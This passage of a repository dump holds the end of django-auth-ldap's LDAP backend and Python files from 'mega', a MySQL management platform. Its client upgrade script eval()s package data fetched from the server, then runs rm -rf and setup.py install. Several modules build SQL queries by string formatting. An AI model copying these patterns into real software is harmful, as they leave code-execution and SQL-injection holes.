e:\n logger.warning(\"%s while authenticating %s\", e, self._username)\n raise\n\n return user\n\n #\n # Public properties (callbacks). 
These are all lazy for performance reasons.\n #\n\n @property\n def dn(self):\n if self._user_dn is None:\n self._load_user_dn()\n\n return self._user_dn\n\n @property\n def attrs(self):\n if self._user_attrs is None:\n self._load_user_attrs()\n\n return self._user_attrs\n\n @property\n def group_dns(self):\n return self._get_groups().get_group_dns()\n\n @property\n def group_names(self):\n return self._get_groups().get_group_names()\n\n @property\n def connection(self):\n if not self._connection_bound:\n self._bind()\n\n return self._get_connection()\n\n #\n # Authentication\n #\n\n def _authenticate_user_dn(self, password):\n \"\"\"\n Binds to the LDAP server with the user's DN and password. Raises\n AuthenticationFailed on failure.\n \"\"\"\n if self.dn is None:\n raise self.AuthenticationFailed(\"failed to map the username to a DN.\")\n\n try:\n sticky = self.settings.BIND_AS_AUTHENTICATING_USER\n\n self._bind_as(self.dn, password, sticky=sticky)\n except ldap.INVALID_CREDENTIALS:\n raise self.AuthenticationFailed(\"user DN/password rejected by LDAP server.\")\n if (\n self._using_simple_bind_mode()\n and sticky\n and self.settings.REFRESH_DN_ON_BIND\n ):\n self._user_dn = self._search_for_user_dn()\n\n def _load_user_attrs(self):\n if self.dn is not None:\n search = LDAPSearch(\n self.dn, ldap.SCOPE_BASE, attrlist=self.settings.USER_ATTRLIST\n )\n results = search.execute(self.connection)\n\n if results is not None and len(results) > 0:\n self._user_attrs = results[0][1]\n\n def _load_user_dn(self):\n \"\"\"\n Populates self._user_dn with the distinguished name of our user.\n\n This will either construct the DN from a template in\n AUTH_LDAP_USER_DN_TEMPLATE or connect to the server and search for it.\n If we have to search, we'll cache the DN.\n\n \"\"\"\n if self._using_simple_bind_mode():\n self._user_dn = self._construct_simple_user_dn()\n else:\n self._user_dn = self._search_for_user_dn()\n\n def _using_simple_bind_mode(self):\n return self.settings.USER_DN_TEMPLATE is not None\n\n def _construct_simple_user_dn(self):\n template = self.settings.USER_DN_TEMPLATE\n username = ldap.dn.escape_dn_chars(self._username)\n return template % {\"user\": username}\n\n def _search_for_user_dn(self):\n \"\"\"\n Searches the directory for a user matching AUTH_LDAP_USER_SEARCH.\n Populates self._user_dn and self._user_attrs.\n \"\"\"\n\n def _search_for_user():\n search = self.settings.USER_SEARCH\n if search is None:\n raise ImproperlyConfigured(\n \"AUTH_LDAP_USER_SEARCH must be an LDAPSearch instance.\"\n )\n\n results = search.execute(self.connection, {\"user\": self._username})\n if results is not None and len(results) == 1:\n (user_dn, self._user_attrs) = next(iter(results))\n else:\n user_dn = None\n\n return user_dn\n\n if self.settings.CACHE_TIMEOUT > 0:\n cache_key = valid_cache_key(\n \"django_auth_ldap.user_dn.{}\".format(self._username)\n )\n return cache.get_or_set(\n cache_key, _search_for_user, self.settings.CACHE_TIMEOUT\n )\n return _search_for_user()\n\n def _check_requirements(self):\n \"\"\"\n Checks all authentication requirements beyond credentials. Raises\n AuthenticationFailed on failure.\n \"\"\"\n self._check_required_group()\n self._check_denied_group()\n\n def _check_required_group(self):\n \"\"\"\n Returns True if the group requirement (AUTH_LDAP_REQUIRE_GROUP) is\n met. 
Always returns True if AUTH_LDAP_REQUIRE_GROUP is None.\n \"\"\"\n required_group_dn = self.settings.REQUIRE_GROUP\n\n if required_group_dn is not None:\n if not isinstance(required_group_dn, LDAPGroupQuery):\n required_group_dn = LDAPGroupQuery(required_group_dn)\n result = required_group_dn.resolve(self)\n if not result:\n raise self.AuthenticationFailed(\n \"user does not satisfy AUTH_LDAP_REQUIRE_GROUP\"\n )\n\n return True\n\n def _check_denied_group(self):\n \"\"\"\n Returns True if the negative group requirement (AUTH_LDAP_DENY_GROUP)\n is met. Always returns True if AUTH_LDAP_DENY_GROUP is None.\n \"\"\"\n denied_group_dn = self.settings.DENY_GROUP\n\n if denied_group_dn is not None:\n is_member = self._get_groups().is_member_of(denied_group_dn)\n if is_member:\n raise self.AuthenticationFailed(\n \"user does not satisfy AUTH_LDAP_DENY_GROUP\"\n )\n\n return True\n\n #\n # User management\n #\n\n def _get_or_create_user(self, force_populate=False):\n \"\"\"\n Loads the User model object from the database or creates it if it\n doesn't exist. Also populates the fields, subject to\n AUTH_LDAP_ALWAYS_UPDATE_USER.\n \"\"\"\n save_user = False\n\n username = self.backend.ldap_to_django_username(self._username)\n\n self._user, built = self.backend.get_or_build_user(username, self)\n self._user.ldap_user = self\n self._user.ldap_username = self._username\n\n should_populate = force_populate or self.settings.ALWAYS_UPDATE_USER or built\n\n if built:\n if self.settings.NO_NEW_USERS:\n raise self.AuthenticationFailed(\n \"user does not satisfy AUTH_LDAP_NO_NEW_USERS\"\n )\n\n logger.debug(\"Creating Django user %s\", username)\n self._user.set_unusable_password()\n save_user = True\n\n if should_populate:\n logger.debug(\"Populating Django user %s\", username)\n self._populate_user()\n save_user = True\n\n # Give the client a chance to finish populating the user just\n # before saving.\n populate_user.send(type(self.backend), user=self._user, ldap_user=self)\n\n if save_user:\n self._user.save()\n\n # This has to wait until we're sure the user has a pk.\n if self.settings.MIRROR_GROUPS or self.settings.MIRROR_GROUPS_EXCEPT:\n self._normalize_mirror_settings()\n self._mirror_groups()\n\n def _populate_user(self):\n \"\"\"\n Populates our User object with information from the LDAP directory.\n \"\"\"\n self._populate_user_from_attributes()\n self._populate_user_from_group_memberships()\n\n def _populate_user_from_attributes(self):\n for field, attr in self.settings.USER_ATTR_MAP.items():\n try:\n value = self.attrs[attr][0]\n except (TypeError, LookupError):\n # TypeError occurs when self.attrs is None as we were unable to\n # load this user's attributes.\n logger.warning(\n \"%s does not have a value for the attribute %s\", self.dn, attr\n )\n else:\n setattr(self._user, field, value)\n\n def _populate_user_from_group_memberships(self):\n for field, group_dns in self.settings.USER_FLAGS_BY_GROUP.items():\n try:\n query = self._normalize_group_dns(group_dns)\n except ValueError as e:\n raise ImproperlyConfigured(\n \"{}: {}\", self.settings._name(\"USER_FLAGS_BY_GROUP\"), e\n )\n\n value = query.resolve(self)\n setattr(self._user, field, value)\n\n def _normalize_group_dns(self, group_dns):\n \"\"\"\n Converts one or more group DNs to an LDAPGroupQuery.\n\n group_dns may be a string, a non-empty list or tuple of strings, or an\n LDAPGroupQuery. The result will be an LDAPGroupQuery. 
A list or tuple\n will be joined with the | operator.\n\n \"\"\"\n if isinstance(group_dns, LDAPGroupQuery):\n query = group_dns\n elif isinstance(group_dns, str):\n query = LDAPGroupQuery(group_dns)\n elif isinstance(group_dns, (list, tuple)) and len(group_dns) > 0:\n query = reduce(operator.or_, map(LDAPGroupQuery, group_dns))\n else:\n raise ValueError(group_dns)\n\n return query\n\n def _normalize_mirror_settings(self):\n \"\"\"\n Validates the group mirroring settings and converts them as necessary.\n \"\"\"\n\n def malformed_mirror_groups_except():\n return ImproperlyConfigured(\n \"{} must be a collection of group names\".format(\n self.settings._name(\"MIRROR_GROUPS_EXCEPT\")\n )\n )\n\n def malformed_mirror_groups():\n return ImproperlyConfigured(\n \"{} must be True or a collection of group names\".format(\n self.settings._name(\"MIRROR_GROUPS\")\n )\n )\n\n mge = self.settings.MIRROR_GROUPS_EXCEPT\n mg = self.settings.MIRROR_GROUPS\n\n if mge is not None:\n if isinstance(mge, (set, frozenset)):\n pass\n elif isinstance(mge, (list, tuple)):\n mge = self.settings.MIRROR_GROUPS_EXCEPT = frozenset(mge)\n else:\n raise malformed_mirror_groups_except()\n\n if not all(isinstance(value, str) for value in mge):\n raise malformed_mirror_groups_except()\n elif mg:\n warnings.warn(\n ConfigurationWarning(\n \"Ignoring {} in favor of {}\".format(\n self.settings._name(\"MIRROR_GROUPS\"),\n self.settings._name(\"MIRROR_GROUPS_EXCEPT\"),\n )\n )\n )\n mg = self.settings.MIRROR_GROUPS = None\n\n if mg is not None:\n if isinstance(mg, (bool, set, frozenset)):\n pass\n elif isinstance(mg, (list, tuple)):\n mg = self.settings.MIRROR_GROUPS = frozenset(mg)\n else:\n raise malformed_mirror_groups()\n\n if isinstance(mg, (set, frozenset)) and (\n not all(isinstance(value, str) for value in mg)\n ):\n raise malformed_mirror_groups()\n\n def _mirror_groups(self):\n \"\"\"\n Mirrors the user's LDAP groups in the Django database and updates the\n user's membership.\n \"\"\"\n target_group_names = frozenset(self._get_groups().get_group_names())\n current_group_names = frozenset(\n self._user.groups.values_list(\"name\", flat=True).iterator()\n )\n\n # These were normalized to sets above.\n MIRROR_GROUPS_EXCEPT = self.settings.MIRROR_GROUPS_EXCEPT\n MIRROR_GROUPS = self.settings.MIRROR_GROUPS\n\n # If the settings are white- or black-listing groups, we'll update\n # target_group_names such that we won't modify the membership of groups\n # beyond our purview.\n if isinstance(MIRROR_GROUPS_EXCEPT, (set, frozenset)):\n target_group_names = (target_group_names - MIRROR_GROUPS_EXCEPT) | (\n current_group_names & MIRROR_GROUPS_EXCEPT\n )\n elif isinstance(MIRROR_GROUPS, (set, frozenset)):\n target_group_names = (target_group_names & MIRROR_GROUPS) | (\n current_group_names - MIRROR_GROUPS\n )\n\n if target_group_names != current_group_names:\n existing_groups = list(\n Group.objects.filter(name__in=target_group_names).iterator()\n )\n existing_group_names = frozenset(group.name for group in existing_groups)\n\n new_groups = [\n Group.objects.get_or_create(name=name)[0]\n for name in target_group_names\n if name not in existing_group_names\n ]\n\n self._user.groups.set(existing_groups + new_groups)\n\n #\n # Group information\n #\n\n def _load_group_permissions(self):\n \"\"\"\n Populates self._group_permissions based on LDAP group membership and\n Django group permissions.\n \"\"\"\n group_names = self._get_groups().get_group_names()\n\n perms = Permission.objects.filter(group__name__in=group_names)\n perms = 
perms.values_list(\"content_type__app_label\", \"codename\")\n perms = perms.order_by()\n\n self._group_permissions = {\"{}.{}\".format(ct, name) for ct, name in perms}\n\n def _get_groups(self):\n \"\"\"\n Returns an _LDAPUserGroups object, which can determine group\n membership.\n \"\"\"\n if self._groups is None:\n self._groups = _LDAPUserGroups(self)\n\n return self._groups\n\n #\n # LDAP connection\n #\n\n def _bind(self):\n \"\"\"\n Binds to the LDAP server with AUTH_LDAP_BIND_DN and\n AUTH_LDAP_BIND_PASSWORD.\n \"\"\"\n self._bind_as(self.settings.BIND_DN, self.settings.BIND_PASSWORD, sticky=True)\n\n def _bind_as(self, bind_dn, bind_password, sticky=False):\n \"\"\"\n Binds to the LDAP server with the given credentials. This does not trap\n exceptions.\n\n If sticky is True, then we will consider the connection to be bound for\n the life of this object. If False, then the caller only wishes to test\n the credentials, after which the connection will be considered unbound.\n \"\"\"\n logger.debug(\"Binding as %s\", bind_dn)\n self._get_connection().simple_bind_s(bind_dn, bind_password)\n\n self._connection_bound = sticky\n\n def _get_connection(self):\n \"\"\"\n Returns our cached LDAPObject, which may or may not be bound.\n \"\"\"\n if self._connection is None:\n uri = self.settings.SERVER_URI\n if callable(uri):\n uri = uri(self._request)\n\n self._connection = self.backend.ldap.initialize(uri, bytes_mode=False)\n\n for opt, value in self.settings.CONNECTION_OPTIONS.items():\n self._connection.set_option(opt, value)\n\n if self.settings.START_TLS:\n logger.debug(\"Initiating TLS\")\n self._connection.start_tls_s()\n\n return self._connection\n\n\nclass _LDAPUserGroups:\n \"\"\"\n Represents the set of groups that a user belongs to.\n \"\"\"\n\n def __init__(self, ldap_user):\n self.settings = ldap_user.settings\n self._ldap_user = ldap_user\n self._group_type = None\n self._group_search = None\n self._group_infos = None\n self._group_dns = None\n self._group_names = None\n\n self._init_group_settings()\n\n def _init_group_settings(self):\n \"\"\"\n Loads the settings we need to deal with groups.\n\n Raises ImproperlyConfigured if anything's not right.\n\n \"\"\"\n self._group_type = self.settings.GROUP_TYPE\n if self._group_type is None:\n raise ImproperlyConfigured(\n \"AUTH_LDAP_GROUP_TYPE must be an LDAPGroupType instance.\"\n )\n\n self._group_search = self.settings.GROUP_SEARCH\n if self._group_search is None:\n raise ImproperlyConfigured(\n \"AUTH_LDAP_GROUP_SEARCH must be an LDAPSearch instance.\"\n )\n\n def get_group_names(self):\n \"\"\"\n Returns the set of Django group names that this user belongs to by\n virtue of LDAP group memberships.\n \"\"\"\n if self._group_names is None:\n self._load_cached_attr(\"_group_names\")\n\n if self._group_names is None:\n group_infos = self._get_group_infos()\n self._group_names = {\n self._group_type.group_name_from_info(group_info)\n for group_info in group_infos\n }\n self._cache_attr(\"_group_names\")\n\n return self._group_names\n\n def is_member_of(self, group_dn):\n \"\"\"\n Returns true if our user is a member of the given group.\n \"\"\"\n is_member = None\n\n # Normalize the DN\n group_dn = group_dn.lower()\n\n # If we have self._group_dns, we'll use it. 
Otherwise, we'll try to\n # avoid the cost of loading it.\n if self._group_dns is None:\n is_member = self._group_type.is_member(self._ldap_user, group_dn)\n\n if is_member is None:\n is_member = group_dn in self.get_group_dns()\n\n membership = \"\" if is_member else \" not\"\n logger.debug(f\"%s is{membership} a member of %s\", self._ldap_user.dn, group_dn)\n\n return is_member\n\n def get_group_dns(self):\n \"\"\"\n Returns a (cached) set of the distinguished names in self._group_infos.\n \"\"\"\n if self._group_dns is None:\n group_infos = self._get_group_infos()\n self._group_dns = {group_info[0] for group_info in group_infos}\n\n return self._group_dns\n\n def _get_group_infos(self):\n \"\"\"\n Returns a (cached) list of group_info structures for the groups that our\n user is a member of.\n \"\"\"\n if self._group_infos is None:\n self._group_infos = self._group_type.user_groups(\n self._ldap_user, self._group_search\n )\n\n return self._group_infos\n\n def _load_cached_attr(self, attr_name):\n if self.settings.CACHE_TIMEOUT > 0:\n key = self._cache_key(attr_name)\n value = cache.get(key)\n setattr(self, attr_name, value)\n\n def _cache_attr(self, attr_name):\n if self.settings.CACHE_TIMEOUT > 0:\n key = self._cache_key(attr_name)\n value = getattr(self, attr_name, None)\n cache.set(key, value, self.settings.CACHE_TIMEOUT)\n\n def _cache_key(self, attr_name):\n \"\"\"\n Memcache keys can't have spaces in them, so we'll remove them from the\n DN for maximum compatibility.\n \"\"\"\n dn = self._ldap_user.dn\n return valid_cache_key(\n \"auth_ldap.{}.{}.{}\".format(type(self).__name__, attr_name, dn)\n )\n\n\ndef valid_cache_key(key):\n \"\"\"\n Sanitizes a cache key for memcached.\n \"\"\"\n return re.sub(r\"\\s+\", \"+\", key)[:250]\n" } ]
22
Captian5ye/mega
https://github.com/Captian5ye/mega
dea669f67ac4da5a4b4d1f9fc21f8233ff7a795c
09a2753b2bc06258ebbb782d1e2ff2db606bfe6f
cadd032022add5dad63de22faa0a87e63522e2f5
refs/heads/master
2021-01-18T07:53:23.005551
2014-10-23T08:16:33
2014-10-23T08:16:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4653141498565674, "alphanum_fraction": 0.5412303805351257, "avg_line_length": 36.29268264770508, "blob_id": "ad2dac3c5eb53fa1c1d391e9b48d85136e5bf54f", "content_id": "182b3d00f600028db4d42a05a6342f24e2270038", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1528, "license_type": "no_license", "max_line_length": 207, "num_lines": 41, "path": "/src/tests/sync_base.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 21, 2014\n\n@author: xchliu\n\n@module:tests.sync_base\n'''\nfrom mega_client import sender\n\ndata_stat={'172.17.62.56:3306':\n {\n 'status': {'com_drop_function': '123', 'performance_schema_socket_instances_lost': '0'},\n 'timestamp':'2014-10-21 10:52:23',\n 'except':{},\n 'slave_status':{}\n }\n }\ndata_base={'172.17.62.56:3306':\n {\n 'timestamp':'2014-10-21 10:52:23',\n 'variables':{'report_port': '3308', 'ignore_builtin_innodb': 'OFF', 'innodb_large_prefix': 'OFF', 'innodb_online_alter_log_max_size': '134217728'},\n 'except':{'test':'test except'}, \n 'mysql_user':{'test@test1':'test','[email protected]': \"aaaGRANT SELECT, INSERT, LOCK TABLES ON `dbchecksum`.* TO 'dbchecksum'@'172.17.62.45'\",}, \n 'db_name':['dbchecksum', 'dbchecksum_bak', 'mega', 'report'], \n 'base':{'cnf': '/export/servers/data/my3308/my.cnf', 'version': '5.6.16'},\n 'table_status':[{'engine': 'InnoDB', 'table_rows': '0', 'index_length': '16384', 'data_length': '16384', 'db_name': 'mega_local', 'table_name': '_dba_worksheet', 'table_comment': ''}] \n } \n }\ncmd='data_collect_save'\nc=sender.MegaClient(cmd=cmd)\n#r=c.run(func_args=data_stat)\n#print \"test data stat:%s\" % r\nr=c.run(func_args=data_base)\nc.close() \nprint \"test data base:%s\" % r\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6177062392234802, "alphanum_fraction": 0.635814905166626, "avg_line_length": 17.44444465637207, "blob_id": "51c5399d461b78592e3cd2d593655f12cfee1511", "content_id": "c40f91668cd8ffc98496168743b0e85ea66843c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 65, "num_lines": 27, "path": "/src/mega_web/monitor/alert_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 25, 2014\n\n@author: xchliu\n\n@module:monitor.alter_manage\n'''\n\nfrom lib.PyMysql import PyMySQL\n\ncursor=PyMySQL()\n\ndef get_alert_list():\n sql=\"select * from alert where stat=0 order by model,target;\"\n return cursor.query(sql,type='dict').fetchall()\n\ndef update_alert(id):\n if not id :\n return False\n sql=\"update alert set stat=1 where id=%s\" % id\n return cursor.execute(sql)\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.4868420958518982, "alphanum_fraction": 0.530701756477356, "avg_line_length": 25.882352828979492, "blob_id": "4c2d42ecdeea97200ae97d579ce4e153a310fd91", "content_id": "622cd1165772ed7f89daaf8136a1b909e2a9f2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 456, "license_type": "no_license", "max_line_length": 119, "num_lines": 17, "path": "/src/mega_web/monitor/baseinfo.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 14, 2014\n\n@author: 
xchliu\n\n@module:mega_web.monitor.baseinfo\n'''\n\na=['172.17.62.37:3306', {'status': None, 'timestamp': None, 'variables': None, 'db_name': None, 'connectible': 'True', \n 'slow_log': None, 'except': [], 'table_status': None, 'error_log': None, 'mysql_user': None, \n 'slave_status': None}]\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5965583324432373, "alphanum_fraction": 0.6271510720252991, "avg_line_length": 12.100000381469727, "blob_id": "c783edabfe8d711498946545c24e3eb7f56b36a2", "content_id": "c29be940e4d8252d7574e6632bba2ab7e49c659d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 651, "license_type": "no_license", "max_line_length": 35, "num_lines": 40, "path": "/docs/project.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Mega\n#Database management platform \n\n* Resource manage\n* Monitor\n* Deployment\n* APIs\n\n##开发语言\n\n\n1. Python 2.7.5\n2. html\n3. js\n4. shell\n\n\n\n##Packages\n\n1. web 前端框架(js,css,jquey):bootstap \n2. web后端框架:django 1.4.2\n3. 绘图框架:chartit\n4. 数据库连接:MySQLdb,django.model\n5. 后台数据库: MySQL\n6. \n\n##Documents\n\n###[项目需求文档](./prd.md)\n###[开发规范](./develop.md)\n###[进度跟踪](./tasklist.md)\n###[API文档](./api.md)\n###[BUG列表](./bugs.md)\n###[Release]()\n\n##功能模块\n### [wydba客户端](./wydba.md) \n### [slow log分析统计](./slow_log.md) \n### [server服务层设计](./framework.md)" }, { "alpha_fraction": 0.601190447807312, "alphanum_fraction": 0.6057692170143127, "avg_line_length": 25.64634132385254, "blob_id": "d8e785ff851ad1fe0f53972af5474387fd157860", "content_id": "8ac61d592251f5d691d061c1e0bbc4a5cd189a97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2184, "license_type": "no_license", "max_line_length": 105, "num_lines": 82, "path": "/src/apis/tools.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:apis.tools\n'''\nimport os\nimport sys\n\nimport release\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\nfrom conf.settings import SERVICE_NAME\nfrom mega_web.resource.server_manage import ServerGet\n\nMODEL='API-tool'\nlog = Logger(MODEL).log()\n\n\ndef client_upgrade(host_list=None):\n \n '''\n client upgrade for the given host list\n '''\n _pag=[]\n log.info('Receive upgrade request: %s ' % host_list)\n pag_name=SERVICE_NAME+\"-\"+release.version\n app_path=os.path.dirname(sys.path[0])\n \n _prefix=os.path.join(app_path,'mega_client',pag_name)\n #pag_path=os.path.join(_prefix,'mega_client')\n try:\n _pag.append(pag_name)\n _pag.extend(_read_file(_prefix,_prefix))\n return _pag\n# log.debug(f)\n except Exception as ex:\n log.error(ex)\n return ''\n\ndef _read_file(path,prefix=''):\n '''\n return a list contains all the file content in the given path \n '''\n if not os.path.isdir(path):\n return []\n data=[]\n for root,dirs,files in os.walk(path):\n for file in files:\n file=os.path.join(root,file) \n _f=open(file,'rb').read()\n _p=file.replace(prefix,'')\n data.append({_p:_f})\n return data\n\ndef client_ping(ip,version=None,**args):\n log.info('Client ping from %s' % ip)\n server_id=ServerGet().get_server_by_ip(ip)\n if not server_id:\n log.error(\"Get server id failed for %s\" % ip)\n return \"unregistered server\"\n server_id=server_id[0]['id']\n sql=\"select count(*) from client where server_id=%s\" % server_id\n _counts=PyMySQL().fetchOne(sql)\n if _counts == 0:\n sql=\"insert 
into client(server_id,version,heartbeat) values(%s,'%s',now())\" % (server_id,version)\n else:\n sql=\"update client set heartbeat=now(),version='%s' where server_id=%s \" %(version,server_id)\n result,ex=PyMySQL().execute(sql)\n if not result:\n log.error(\"Client keepalived check failed: %s %s\" %(ip,ex))\n return ''\n return result\n \ndef main():\n print client_upgrade()\n\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5297029614448547, "alphanum_fraction": 0.5361766815185547, "avg_line_length": 29.195402145385742, "blob_id": "48b95be4226f907cc1db6d15e94ac2e1e19f75b0", "content_id": "294c4503b8d213c9a042347f8e33fccc72286f10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2626, "license_type": "no_license", "max_line_length": 85, "num_lines": 87, "path": "/src/mega_client/mega_client/script/upgrade.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 30, 2014\n\n@author: xchliu\n\n@module:mega_service.mega_client.upgrade\n'''\nimport os\nimport commands\nfrom mega_client.logs import Logger\nfrom mega_client.sender import MegaClient\nfrom mega_client.utils import get_ip_address\nfrom mega_client.setting import CLIENT_DIR,MEGA_HOST\n\nMODEL='Upgrade'\nlog = Logger(MODEL).log()\n\nclass Upgrade():\n \n def __init__(self):\n self.mega_server=MEGA_HOST\n self.cmd='client_upgrade' \n self.c=MegaClient(host=self.mega_server,cmd=self.cmd)\n self.setup_path=''\n \n def _get_pag(self):\n log.info('Start mega client upgrade')\n domain,ip=get_ip_address()\n ip=\"['\"+ip+\"']\" \n pag=self.c.run(func_args=ip,TOOL=True)\n if pag==0:\n log.error('Failed to connect to mega server:%s' % self.mega_server)\n return False\n pag=eval(pag)\n tmp_dir=os.path.join('/tmp',pag.pop(0))\n self.setup_path=tmp_dir\n if not os.path.isdir(tmp_dir):\n os.mkdir(tmp_dir)\n for p in pag:\n #/mega_client/__init__.py\n file_name=p.items()[0][0].lstrip('/')\n file_content=p.items()[0][1]\n file_path=os.path.join(tmp_dir,'/'.join(file_name.split('/')[:-1]))\n if not os.path.isdir(file_path):\n os.makedirs(file_path)\n f=open(os.path.join(tmp_dir,file_name),'wb+')\n f.write(file_content)\n f.close()\n return True\n \n def run(self):\n if not self._get_pag():\n return False\n #install package\n os.chdir(self.setup_path)\n cmd=(\n ['Remove old package','cat %s/record.info| xargs rm -rf' % CLIENT_DIR ],\n ['Update package','python %s/setup.py install' %self.setup_path],\n ['Replace client source','cp -r %s %s' % (self.setup_path,CLIENT_DIR)],\n ['Change file mod','chmod a+x /etc/init.d/mega_client'],\n ['Stop mega client','python /etc/init.d/mega_client upgrade']\n )\n for c in cmd:\n result=self._do_command(c[1],c[0])\n if not result:\n log.error('Abort upgrade!')\n break\n\n def _do_command(self,cmd,action):\n _status,_output=commands.getstatusoutput(cmd)\n if _status <> 0:\n log.error('%s failed : %s' % (action,_output))\n return False\n else:\n log.info('%s success:%s' % (action,_output))\n return True\n\n\n \n \n \ndef main():\n Upgrade().run()\n \nif __name__ == \"__main__\": \n main()" }, { "alpha_fraction": 0.48902076482772827, "alphanum_fraction": 0.49732938408851624, "avg_line_length": 28.928571701049805, "blob_id": "e1bb3f27c17b7d70eeb2086718065e43d62f02bb", "content_id": "9547b49957d29aaf9ae0106e18630665b22a5e4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1685, "license_type": "no_license", "max_line_length": 117, 
"num_lines": 56, "path": "/src/mega_service/tracker.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import time\nfrom lib.logs import Logger\nfrom lib.PyMysql import PyMySQL\nfrom mega_service.task import Task\nfrom conf.settings import TRACKER_LIFCYCLE\n\nMODEL='Tracker'\nlog=Logger(MODEL).log()\n\nclass Tracker():\n def __init__(self,queue):\n '''\n Two type tasks would be tracked :\n 1.cycle task on the specified time\n 2.realtime task need to be retry\n '''\n self.queue=queue \n self.q=PyMySQL()\n \n def tracker(self):\n data=None\n while 1:\n try:\n data=self.routine_task()\n for d in data:\n self.queue.put(d)\n time.sleep(TRACKER_LIFCYCLE)\n except Exception as ex:\n log.error(ex)\n \n def routine_task(self):\n _task=[]\n _t={}\n now=time.strftime('%H:%M',time.localtime(time.time()))\n sql=\"select * from task where timestampdiff(second,last_time,now())>=cycle and stat=1;\"\n for t in self.q.fetchAll(sql):\n _t={}\n _t[\"ARGS\"]=\"'\"+str(now)+\"'\" \n _t[\"NAME\"]=t[1]\n _t[\"TYPE\"]=t[2]\n _t[\"VALUE\"]=t[3]\n _t[\"LAST_TIME\"]=t[4]\n _t[\"CYCLE\"]=t[5]\n _t[\"TARGET\"]=t[6]\n _t[\"SCRIPT\"]=t[9]\n _t[\"TIME\"]=0 #realtime jobs\n _t[\"TASK_ID\"]=t[0] # used to log the task status when mega client run over the task and return the output\n _task.append(_t)\n #update the last_time of task up to now\n Task().stat_task_by_id(t[0])\n if _task:\n log.debug(_task)\n return _task\n \n def retry_task(self):\n return \n " }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.5178571343421936, "avg_line_length": 8.600000381469727, "blob_id": "f393c88d6638905347757a77800089d5f5320c1b", "content_id": "958fc4470de81ec03bdc8f28003e4de0324ca378", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 22, "num_lines": 5, "path": "/src/mega_web/lib/__init__.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 1, 2014\n\n@author: xchliu\n'''\n " }, { "alpha_fraction": 0.5344827771186829, "alphanum_fraction": 0.5747126340866089, "avg_line_length": 12.461538314819336, "blob_id": "0714c0afdfb61707cdca00bfd60edb8de8ed7e28", "content_id": "2dc7eaf723de1548ea97a6ebb9a09dd50a351d21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/src/mega_service/resource/sync_stat.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 17, 2014\n\n@author: xchliu\n\n@module:mega_service.resource.sync_stat\n'''\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5818981528282166, "alphanum_fraction": 0.5850408673286438, "avg_line_length": 36.32863998413086, "blob_id": "b167cf0f7725aba440814ec06e4e46cfc359e8dc", "content_id": "d96c7afa9db4728173fe9c0ce481fa1053e8b103", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7955, "license_type": "no_license", "max_line_length": 151, "num_lines": 213, "path": "/src/mega_web/resource/instance_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import datetime\nfrom conf.GlobalConf import *\nfrom lib.PyMysql import PyMySQL\nfrom lib.utils import check_ip,is_int\nfrom server_manage import ServerGet,ServerManage\nfrom mega_web.entity.models import Instance,Business,User\nfrom 
mega_service.resource.get_value import get_instance_newest_variable,get_instance_newest_stat\n\nMSG_ERR_INSTANCE_NOT_EXITST='instance does not exists!'\n\nclass InstanceManage():\n def __init__(self,instance):\n '''\n instance : a dict with instance base info\n '''\n self.inst_id=instance.get(\"instance_id\") \n self.inst_ip=instance.get(\"instance_ip\")\n self.inst_port=instance.get(\"instance_port\")\n self.inst_level=instance.get(\"instance_level\")\n self.inst_name=instance.get(\"instance_name\")\n self.inst_owner=instance.get(\"instance_owner\")\n self.inst_business=instance.get(\"instance_business\")\n self.inst_online_date=instance.get(\"instance_online\")\n self.inst_dbtype=instance.get(\"instance_db_type\")\n self.inst_hatype=instance.get(\"instance_ha_type\")\n self.inst_version=instance.get(\"instance_version\")\n self.inst_role=instance.get('instance_role')\n self.inst_master=instance.get('instance_master')\n self.msg=''\n \n def data_check(self):\n if not self.inst_ip or not check_ip(self.inst_ip):\n self.msg+=MSG_ERR_IP\n return False\n if is_int(self.inst_port):\n self.msg+=MSG_ERR_PORT\n return False\n if not self.inst_level:\n 